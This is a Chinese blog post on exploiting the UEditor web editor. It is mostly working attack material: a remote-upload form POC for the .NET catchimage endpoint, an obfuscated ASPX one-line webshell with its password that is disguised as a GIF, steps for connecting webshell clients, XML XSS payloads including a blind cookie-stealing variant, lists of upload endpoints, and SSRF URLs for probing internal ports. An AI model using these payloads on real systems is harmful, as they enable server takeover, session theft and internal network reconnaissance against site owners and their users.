【漏洞复现】ueditor 编辑器漏洞利用

  • 内容
  • 相关

oxo1 Getshell#

本地上传POC:

<form action="http://www.xxxxx.com/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">
  shell addr: <input type="text" name="source[]" />
  <input type="submit" value="Submit" />
</form>


一句话木马:密码:hello

GIF89a
<script runat="server" language="JScript">
    function popup(str) {
        var q = "u";
        var w = "afe";
        var a = q + "ns" + w; var b= eval(str,a); return(b);
    }
</script>
<% popup(popup(System.Text.Encoding.GetEncoding(65001). GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJoZWxsbyJd")))); %>


远程部署一个Webshell,名称为:1.gif;.aspx

http://127.0.0.1/1.gif;.aspx


浏览POC、输入远程Webshell的地址

1.png

点击提交、运气好就可以得到一个webshell地址、得到地址还会有各种情况出现。(冰蝎的shell会报错、访问出错的时候、尝试换多几个shell看看)

2.png

没报错、说明运气不错、成功得到webshell

默认路径:http://www.xxxx.com/ueditor/net/upload/image/20191022/6370735180294792151176942.aspx

3.png
菜刀/蚁剑连之

4.png

oxo2 XSS#

XML_XSS:

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
</body>
</html>

盲打Cookie、src="":
<something:script src="" xmlns:something="http://www.w3.org/1999/xhtml"></something:script>


Ueditor 默认支持上传 xml :config.json可以查看支持上传的后缀

/ueditor/asp/config.json

/ueditor/net/config.json

/ueditor/php/config.json

/ueditor/jsp/config.json


上传文件路径

/ueditor/index.html

/ueditor/asp/controller.asp?action=uploadimage

/ueditor/asp/controller.asp?action=uploadfile

/ueditor/net/controller.ashx?action=uploadimage

/ueditor/net/controller.ashx?action=uploadfile

/ueditor/php/controller.php?action=uploadfile

/ueditor/php/controller.php?action=uploadimage

/ueditor/jsp/controller.jsp?action=uploadfile

/ueditor/jsp/controller.jsp?action=uploadimage

上传图片、抓取数据包

5.png

修改URL、和上传的文件

6.png

浏览触发

7.png

列出已经上传的文件

/ueditor/net/controller.ashx?action=listfile

/ueditor/net/controller.ashx?action=listimage


oxo3 SSRF#

存在漏洞路径:

/ueditor/jsp/getRemoteImage.jsp?upfile=http://127.0.0.1/favicon.ico?.jpg

/ueditor/jsp/controller.jsp?action=catchimage&source[]=https://www.baidu.com/img/baidu_jgylogo3.gif

/ueditor/php/controller.php?action=catchimage&source[]=https://www.baidu.com/img/baidu_jgylogo3.gif

存在就会抓取成功、也可以抓取外网的测试

8.png

端口不存在就会报错500

9.png

成功Burpsuite来探测端口、探测内网需要知道内网IP段

10.png
都是搜索学习的,只是做了一个小总结。忘记在哪看的了就不写参考链接了,如有侵权请联系删除!#

本文标签:

版权声明:若无特殊注明,本文皆为《T0ex4》原创,转载请保留文章出处。

本文链接:【漏洞复现】ueditor 编辑器漏洞利用 - https://www.k1q.cn/post-64.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注